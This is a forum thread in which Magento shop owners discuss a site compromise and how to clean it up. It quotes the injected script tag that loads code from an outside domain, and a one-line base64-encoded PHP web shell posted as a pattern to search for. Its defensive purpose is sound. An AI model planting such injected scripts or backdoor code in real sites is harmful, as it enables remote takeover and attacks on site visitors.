Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Please help! someone put a script on my page
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

Hi There someone put a script code on my page and I dont know how to find it. It loads another webpage (prcfunding.com). Here is the code:

<script type="text/javascript">var Translator = new Translate([]);</script>
<!-- START silver-widget -->
<script type="text/javascript" src="http://www.mywebsite.co.uk/skin/frontend/default/puretheme/gallerywidget/swfobject.js"></script>
<!-- END silver-widget --></head><script src=http://prcfunding.com/pages/desktop.php ></script>
<body class=” catalog-category-view categorypath-for-him-html category-personalised-gifts-for-him">

<!-- Remove before production -->
<!-- End Remove -->

<div class="wrapper">
<!-- start header -->
<div class="header">

<div class="header-top-container">
<div class="header-top">

 
Magento Community Magento Community
Magento Community
Magento Community
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

I searched the database and files and the script code was in the goggle and yahoo site verification files.(html).

I deleted them but I can still see the script in the source code. Any ideas?

Thanks

 
Magento Community Magento Community
Magento Community
Magento Community
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hi there ali,

same problem happed with me yesterday, I found your post form google,

I do’t know how he could enter or he what wants !!!

I can give you some tips to protect your site, litsen:

1- disable the php function base64_decode from your server or ask the admin server to do that .
2- change your login password
3- check your site files : delete what he created and replace the changed files.

 
Magento Community Magento Community
Magento Community
Magento Community
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 
alaa462 - 10 November 2009 09:21 AM

Hi there ali,


same problem happed with me yesterday, I found your post form google,

I do’t know how he could enter or he what wants !!!

I can give you some tips to protect your site, litsen:

1- disable the php function base64_decode from your server or ask the admin server to do that .
2- change your login password
3- check your site files : delete what he created and replace the changed files.

Hi Alaa,

The thing is I downloaded my files(so this overwrite the logs) from the server so host can not find from the logs which files he or she created or edited. We found 5 index.php files edited. They added some codes to beginning of the files but dont know which others edited or created.

Can you advise or tell me which which files they edited or created with you?

What happens if I disable php function base64_decoder? Any effects to functionality?

Is database clean?

thanks

 
Magento Community Magento Community
Magento Community
Magento Community
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hi again,

The hacker has add some php codes in some files so that its could edite the other files automatically.

First he created a new file called “gifimg.php” in my images folder and I figure the file was the reason to edit the other files,

and he add a code in my php, html, js files, he used the function base64_decode in his script, he did’t play with database.

so if you do’t want to make his script to create or edit your files automatically: disable the function and replace the modified files with the orginal files or delete it all and upload it if you have a full backup.

actually I do’t know how he could do that !!! my site is really secure and online for 1 month only !!!

 
Magento Community Magento Community
Magento Community
Magento Community
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

by the way try to search for some codes like this one:

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
 
Magento Community Magento Community
Magento Community
Magento Community
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hey ali, I did a search for that problem and I can say its like a virus.

I got this resolve for you :

1) First you need to repair all those effected files with un-effected/original/backup files. You can filter those file by looking at the file detail (last created/edited), usually the latest created/edit are the effected files (view the file’s code to confirm).
Make sure you scan your backup files with the latest antivirus (Recommend avast as iframe remover).

2) Once all the files has been recovered, disable your server ftp for temporary purpose.

3) Then its time for you to change all your account/server/ftp with a strong new password.

4) Enable your ftp server and set them only use 1 connection per session and disable the ftp monitoring too.

5) Disable back your ftp server and only enable them when you want to use ftp in your end.

the orginal link:
http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/

 
Magento Community Magento Community
Magento Community
Magento Community
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

Yes they created files in my image folders too. I got rid of them. But As I uploaded my back up filesjust after infected I dont know which other files they edited or created and cant find it easily. So I think I should just dlete everything and reinstall magneto and use the old database.

Any thoughts on this or suggestions.

Anymore info how did they hack? If it is through my pc I have to reformat my pc as avast doesnt detect anything. I scanned twice.

thanks

 
Magento Community Magento Community
Magento Community
Magento Community
 
ecommerce glasgow
Jr. Member
 
Total Posts:  7
Joined:  2009-01-18
 

Hi mate

Most hacks are done via insecure , FTP info , such as username www.yourdomain and password , myonlineshop , scotlandshop,
anything that can be cracked via brut force ,

what is brute force, its when an app trys to guess a password using a password file , to give you an example i have herad people can by a password file , a simple txt. file thats 30gig in size, with millions of passwords.

once they get the password they would create a backdoor in , just incase you change your password, but this is not alway possible.

change your ftp to something crazy like “323£!ZAd_%”

this will help, also back up your site and scan offline .

Its a pain ,

 
Magento Community Magento Community
Magento Community
Magento Community
 
Shahil
Member
 
Total Posts:  36
Joined:  2008-05-19
 

SFTP is also helpful to prevent such attack.It will be better to use SFTP instead of FTP. If possible, remove write permission on main index.php. so that no one will be able to write on that file.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top